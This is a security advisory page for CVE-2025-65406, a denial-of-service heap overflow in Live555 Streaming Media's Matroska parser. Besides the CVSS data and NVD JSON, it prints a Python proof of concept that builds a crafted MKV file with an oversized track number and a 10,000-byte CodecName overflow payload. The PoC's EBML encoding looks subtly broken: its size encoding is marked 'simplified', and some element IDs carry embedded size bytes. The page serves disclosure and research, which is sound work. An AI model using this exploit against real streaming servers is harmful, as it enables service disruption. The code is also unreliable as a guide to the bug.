Security Vulnerability Report
CVE-2025-65406 CVSS 6.5 MEDIUM

Published: 2025-12-01 17:15:50
Last Modified: 2025-12-23 13:45:31

Description

A heap overflow in the MatroskaFile::createRTPSinkForTrackNumber() function of Live555 Streaming Media v2018.09.02 allows attackers to cause a Denial of Service (DoS) via supplying a crafted MKV file.

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:live555:streaming_media:2018-09-02:*:*:*:*:*:*:* - VULNERABLE
Live555 Streaming Media v2018.09.02

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
# PoC for CVE-2025-65406: Live555 MatroskaFile Heap Overflow
# Generate a crafted MKV file to trigger heap overflow in createRTPSinkForTrackNumber()
import struct
import os


def create_ebml_element(element_id, data):
    """Create an EBML element for MKV format"""
    size = len(data)
    # EBML size encoding (simplified)
    size_bytes = bytes([0x80 | ((size >> (7 * i)) & 0x7F) for i in range(4) if size >> (7 * i) or i == 0])
    return element_id + size_bytes + data


def create_crafted_mkv():
    """Generate a malicious MKV file to trigger heap overflow"""
    # EBML Header
    ebml_header = create_ebml_element(
        b'\x1A\x45\xDF\xA3',  # EBML ID
        create_ebml_element(b'\x42\x86\x81\x01', b'\x01') +  # EBMLVersion
        create_ebml_element(b'\x42\xF7\x81\x01', b'\x04') +  # EBMLReadVersion
        create_ebml_element(b'\x42\xF2\x81\x04', b'\x01') +  # EBMLMaxIDLength
        create_ebml_element(b'\x42\xF3\x81\x08', b'\x01')  # EBMLMaxSizeLength
    )

    # Segment header
    segment = b'\x18\x53\x80\x67' + b'\x01\xFF\xFF\xFF\xFF\xFF\xFF\xFF'  # Segment ID with unknown size

    # Create TrackEntry with malicious data to trigger overflow
    # Crafted track number that triggers the vulnerability
    track_entry = create_ebml_element(
        b'\xAE',  # TrackEntry
        create_ebml_element(b'\xD7', b'\xFF') +  # TrackNumber (crafted value)
        create_ebml_element(b'\x86\x39', b'\x01') +  # TrackUID
        create_ebml_element(b'\x83', b'\x01') +  # TrackType (video=1)
        # Crafted CodecName or other field to trigger overflow
        create_ebml_element(b'\x26\x82\x84', b'A' * 10000)  # CodecName with overflow payload
    )

    # Tracks element
    tracks = create_ebml_element(b'\x16\x54\xAE\x6F', track_entry)

    # Cluster element (minimal)
    cluster = create_ebml_element(
        b'\x1F\x43\xB6\x75',  # Cluster
        create_ebml_element(b'\xE7', b'\x00\x00\x00\x00') +  # Timecode
        b'\x00'  # SimpleBlock placeholder
    )

    return ebml_header + segment + tracks + cluster


def main():
    output_file = 'CVE-2025-65406_poc.mkv'
    crafted_data = create_crafted_mkv()
    with open(output_file, 'wb') as f:
        f.write(crafted_data)
    print(f'[+] Created malicious MKV file: {output_file}')
    print(f'[+] File size: {len(crafted_data)} bytes')
    print('[!] This file can trigger heap overflow in Live555 when processed')


if __name__ == '__main__':
    main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65406", "sourceIdentifier": "[email protected]", "published": "2025-12-01T17:15:50.260", "lastModified": "2025-12-23T13:45:31.453", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A heap overflow in the MatroskaFile::createRTPSinkForTrackNumber() function of Live555 Streaming Media v2018.09.02 allows attackers to cause a Denial of Service (DoS) via supplying a crafted MKV file."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-122"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:live555:streaming_media:2018-09-02:*:*:*:*:*:*:*", "matchCriteriaId": "C9F01989-4E5A-42B7-8EF7-74E3A5335754"}]}]}], "references": [{"url": "https://github.com/rgaufman/live555", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://shimo.im/docs/1lq7rMrp8lI1vW3e", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}